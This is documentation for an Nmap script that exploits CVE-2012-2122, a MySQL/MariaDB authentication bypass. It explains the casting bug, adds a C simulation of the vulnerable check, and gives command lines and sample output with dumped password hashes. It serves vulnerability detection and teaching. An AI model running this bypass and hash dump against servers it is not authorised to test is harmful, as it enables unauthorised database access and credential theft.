Script mysql-vuln-cve2012-2122

Script types: portrule
Categories: discovery, intrusive, vuln
Download: https://svn.nmap.org/nmap/scripts/mysql-vuln-cve2012-2122.nse

Script Summary

Attempts to bypass authentication in MySQL and MariaDB servers by exploiting CVE-2012-2122. If the server is vulnerable, the script will also attempt to dump the MySQL usernames and password hashes.

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 are vulnerable, but exploitation depends on whether the platform's memcmp() can return a value outside the -128..127 range: the server narrows the int result to a char, so only a libc whose memcmp() returns a raw (multi-byte) difference rather than -1, 0 or 1 makes the bug reachable. Some optimized 64-bit Linux builds of the C library do this; many other builds do not, which is why a server can run a vulnerable version and still not be exploitable.

"When a user connects to MariaDB/MySQL, a token (SHA over a password and a random scramble string) is calculated and compared with the expected value. Because of incorrect casting, it might've happened that the token and the expected value were considered equal, even if the memcmp() returned a non-zero value. In this case MySQL/MariaDB would think that the password is correct, even while it is not. Because the protocol uses random strings, the probability of hitting this bug is about 1/256. Which means, if one knows a user name to connect (and "root" almost always exists), she can connect using *any* password by repeating connection attempts. ~300 attempts takes only a fraction of second, so basically account password protection is as good as nonexistent."
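To make the casting bug concrete, the following is an added example, not code from Nmap or from the MySQL/MariaDB sources. It reproduces the shape of the vulnerable check_scramble() (an int from memcmp() returned through a char-typed my_bool) next to the fixed shape, and then runs the repeated-attempt loop the advisory describes. wide_memcmp is a constructed stand-in for an optimized libc memcmp() that returns the full 16-bit word difference; the token values and the PRNG are likewise constructed for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define SHA1_HASH_SIZE 20

/* MySQL's my_bool was a plain char: an int returned into it is narrowed. */
typedef char my_bool;

/* Constructed stand-in for an optimized libc memcmp() that compares two
 * bytes at a time and returns the whole 16-bit word difference, so the
 * result is often far outside -128..127. A simulation, not glibc's code. */
static int wide_memcmp(const void *a, const void *b, size_t n)
{
    const unsigned char *x = a, *y = b;
    size_t i = 0;
    for (; i + 1 < n; i += 2) {
        int wx = (x[i] << 8) | x[i + 1];
        int wy = (y[i] << 8) | y[i + 1];
        if (wx != wy)
            return wx - wy;
    }
    for (; i < n; i++)
        if (x[i] != y[i])
            return (int)x[i] - (int)y[i];
    return 0;
}

/* Shape of the vulnerable check_scramble(): non-zero means mismatch, but
 * the int is narrowed to char on return, so any multiple of 256 collapses
 * to 0 and the wrong password is accepted. */
static my_bool check_scramble_vuln(const unsigned char *hash_stage2,
                                   const unsigned char *hash_stage2_reassured)
{
    return wide_memcmp(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE);
}

/* Fixed shape: normalise to 0/1 before the narrowing conversion. */
static my_bool check_scramble_fixed(const unsigned char *hash_stage2,
                                    const unsigned char *hash_stage2_reassured)
{
    return wide_memcmp(hash_stage2, hash_stage2_reassured, SHA1_HASH_SIZE) != 0;
}

/* Two concrete token pairs: a first-byte mismatch gives a word difference
 * of -256 (narrowed to 0), a second-byte mismatch gives -1 (survives). */
static int vulnerable_accepts_first_byte_mismatch(void)
{
    unsigned char a[SHA1_HASH_SIZE] = {0}, b[SHA1_HASH_SIZE] = {0};
    b[0] = 1;
    return check_scramble_vuln(a, b) == 0 && check_scramble_fixed(a, b) != 0;
}

static int vulnerable_rejects_second_byte_mismatch(void)
{
    unsigned char a[SHA1_HASH_SIZE] = {0}, b[SHA1_HASH_SIZE] = {0};
    b[1] = 1;
    return check_scramble_vuln(a, b) != 0 && check_scramble_fixed(a, b) != 0;
}

/* xorshift64* so the simulation is deterministic for a given non-zero seed. */
static uint64_t next_rand(uint64_t *s)
{
    uint64_t x = *s;
    x ^= x >> 12; x ^= x << 25; x ^= x >> 27;
    *s = x;
    return x * 0x2545F4914F6CDD1DULL;
}

static void random_token(unsigned char *t, uint64_t *s)
{
    for (int i = 0; i < SHA1_HASH_SIZE; i++)
        t[i] = (unsigned char)(next_rand(s) >> 56);
}

/* Model of the attack loop: every connection attempt gets a fresh random
 * scramble, hence a fresh (expected, supplied) token pair. Returns the
 * first iteration at which the vulnerable check accepts a wrong password,
 * or 0 if none is accepted within max_iterations. */
static unsigned first_false_accept(uint64_t seed, unsigned max_iterations)
{
    unsigned char expected[SHA1_HASH_SIZE], supplied[SHA1_HASH_SIZE];
    for (unsigned i = 1; i <= max_iterations; i++) {
        random_token(expected, &seed);
        random_token(supplied, &seed);
        if (check_scramble_vuln(expected, supplied) == 0 &&
            check_scramble_fixed(expected, supplied) != 0)
            return i;
    }
    return 0;
}

/* How many of `trials` wrong-password attempts the vulnerable check lets
 * through; with this memcmp model it is roughly trials/256. */
static unsigned count_false_accepts(uint64_t seed, unsigned trials)
{
    unsigned char expected[SHA1_HASH_SIZE], supplied[SHA1_HASH_SIZE];
    unsigned accepted = 0;
    for (unsigned i = 0; i < trials; i++) {
        random_token(expected, &seed);
        random_token(supplied, &seed);
        if (check_scramble_vuln(expected, supplied) == 0 &&
            check_scramble_fixed(expected, supplied) != 0)
            accepted++;
    }
    return accepted;
}

int main(void)
{
    const uint64_t seed = 0x9E3779B97F4A7C15ULL;
    unsigned trials = 200000;
    printf("vulnerable check accepted %u of %u wrong passwords\n",
           count_false_accepts(seed, trials), trials);
    printf("first false accept at iteration #%u (0 = none in 1500)\n",
           first_false_accept(seed, 1500));
    return 0;
}
```

Swapping wide_memcmp for the platform's own memcmp() turns this into a quick exploitability check for a given libc: if count_false_accepts stays at 0, that memcmp() only ever returns values within -128..127 and the narrowing can never produce a false match, which matches the caveat above that a vulnerable version is not always an exploitable one.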

Original public advisory:

Interesting post about this vuln:

Script Arguments

mysql-vuln-cve2012-2122.pass

MySQL password. Default: nmapFTW.

mysql-vuln-cve2012-2122.user

MySQL username. Default: root.

mysql-vuln-cve2012-2122.iterations

Connection retries. Default: 1500.

mysql-vuln-cve2012-2122.socket_timeout

Socket timeout. Default: 5s.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

  • nmap -p3306 --script mysql-vuln-cve2012-2122 <target>
  • nmap -sV --script mysql-vuln-cve2012-2122 <target>

Script Output

PORT     STATE SERVICE REASON
3306/tcp open  mysql   syn-ack
| mysql-vuln-cve2012-2122:
|   VULNERABLE:
|   Authentication bypass in MySQL servers.
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-2122
|     Description:
|       When a user connects to MariaDB/MySQL, a token (SHA
|       over a password and a random scramble string) is calculated and compared
|       with the expected value. Because of incorrect casting, it might've
|       happened that the token and the expected value were considered equal,
|       even if the memcmp() returned a non-zero value. In this case
|       MySQL/MariaDB would think that the password is correct, even while it is
|       not.  Because the protocol uses random strings, the probability of
|       hitting this bug is about 1/256.
|       Which means, if one knows a user name to connect (and "root" almost
|       always exists), she can connect using *any* password by repeating
|       connection attempts. ~300 attempts takes only a fraction of second, so
|       basically account password protection is as good as nonexistent.
|
|     Disclosure date: 2012-06-9
|     Extra information:
|       Server granted access at iteration #204
|     root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
|     debian-sys-maint:*BDA9386EE35F7F326239844C185B01E3912749BF
|     phpmyadmin:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
|     References:
|       https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
|       http://seclists.org/oss-sec/2012/q2/493
|_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122

Requires


Author:

  • Paulino Calderon <calderon@websec.mx>

License: Same as Nmap--See https://nmap.org/book/man-legal.html